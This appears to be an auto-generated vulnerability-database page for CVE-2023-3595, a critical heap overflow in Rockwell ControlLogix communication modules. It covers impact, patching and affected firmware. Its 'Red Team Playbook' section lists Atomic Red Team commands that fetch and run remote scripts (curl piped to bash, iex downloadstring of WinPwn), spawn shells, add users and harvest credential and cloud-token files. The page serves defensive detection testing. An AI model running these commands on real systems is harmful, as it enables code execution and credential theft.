CVE-2023-3595
Overview
This vulnerability is a heap-based buffer overflow in the CIP (Common Industrial Protocol) message processing component of Rockwell Automation 1756 EN2* and EN3* ControlLogix communication modules. The flaw arises from improper validation of incoming CIP message lengths, allowing crafted packets to overwrite memory beyond allocated buffers. The affected component is the firmware handling CIP message parsing on the 1756-EN2T Series A, B, and C devices.
Vulnerability Description
Where this vulnerability exists in the Rockwell Automation 1756 EN2* and 1756 EN3* ControlLogix communication products, it could allow a malicious user to perform remote code execution with persistence on the target system through maliciously crafted CIP messages. This includes the ability to modify, deny, and exfiltrate data passing through the device.
Impact
An unauthenticated attacker with network access to the affected devices can execute arbitrary code remotely with persistence, enabling modification, denial, or exfiltration of data traversing the device. This facilitates full control over the communication module, potentially disrupting industrial control processes and compromising data integrity and confidentiality. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms no authentication or user interaction is required, emphasizing the ease of exploitation.
Solution
Rockwell Automation has released firmware updates addressing this vulnerability for the 1756-EN2T Series A, B, and C modules. Users should apply the patches as detailed in the vendor advisory at https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1140010. The advisory provides explicit instructions for updating affected firmware versions and recommends immediate deployment to mitigate risk. No alternative workarounds are specified.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Rockwell Automation's 1756 EN2 and 1756 EN3 ControlLogix communication products is characterized by the potential for remote code execution via maliciously crafted Common Industrial Protocol (CIP) messages. This flaw arises from inadequate validation of incoming messages, allowing an attacker to inject arbitrary code into the system. Once executed, this code can enable the attacker to manipulate the device's operations, leading to unauthorized data modification, denial of service, or even data exfiltration. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk to the integrity and confidentiality of the systems involved.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting systems that are inadequately secured or lack proper segmentation from untrusted networks. An attacker could leverage social engineering tactics to gain initial access or exploit existing weaknesses in network defenses to send crafted CIP messages directly to the vulnerable devices. Once the attacker successfully executes code on the target system, they can establish persistence, allowing ongoing control over the device. This could lead to cascading failures in industrial processes, as the attacker could manipulate the operational parameters of critical infrastructure.
The real-world implications of this vulnerability are significant, particularly for industries relying on Rockwell Automation products for automation and control. A successful attack could disrupt manufacturing processes, compromise safety systems, and lead to substantial financial losses. Moreover, the potential for data exfiltration raises concerns about intellectual property theft and regulatory compliance violations, especially in sectors such as pharmaceuticals, energy, and transportation. The reputational damage from such incidents can also be profound, leading to loss of customer trust and potential legal ramifications.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected devices is paramount, as it addresses known vulnerabilities and reduces the attack surface. Network segmentation can also play a crucial role in limiting exposure; by isolating critical control systems from general IT networks, organizations can minimize the risk of unauthorized access. Intrusion detection systems (IDS) should be deployed to monitor for anomalous traffic patterns indicative of exploitation attempts. Additionally, organizations should conduct regular security assessments and penetration testing to identify and remediate weaknesses in their industrial control systems.
In conclusion, the vulnerability affecting Rockwell Automation's ControlLogix communication products poses a critical threat to industrial environments. The potential for remote code execution through crafted CIP messages highlights the need for robust security measures in industrial control systems. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare to defend against such vulnerabilities and mitigate the associated risks. Proactive security strategies, including timely updates, network segmentation, and continuous monitoring, are essential to safeguarding critical infrastructure from malicious actors.
Affected Products (12)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Rockwellautomation | 1756-En2f Series A Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en2f_series_a_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En2f Series B Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en2f_series_b_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En2f Series C Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en2f_series_c_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En2t Series A Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en2t_series_a_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En2t Series B Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en2t_series_b_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En2t Series C Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en2t_series_c_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En2t Series D Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en2t_series_d_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En2tr Series A Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en2tr_series_a_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En2tr Series B Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en2tr_series_b_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En2tr Series C Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en2tr_series_c_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En3tr Series A Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en3tr_series_a_firmware:-:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | 1756-En3tr Series B Firmware | N/A |
cpe:2.3:o:rockwellautomation:1756-en3tr_series_b_firmware:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-3595 |
| rockwellautomation.custhelp.com |
GitHub CVE
|
https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1140010 |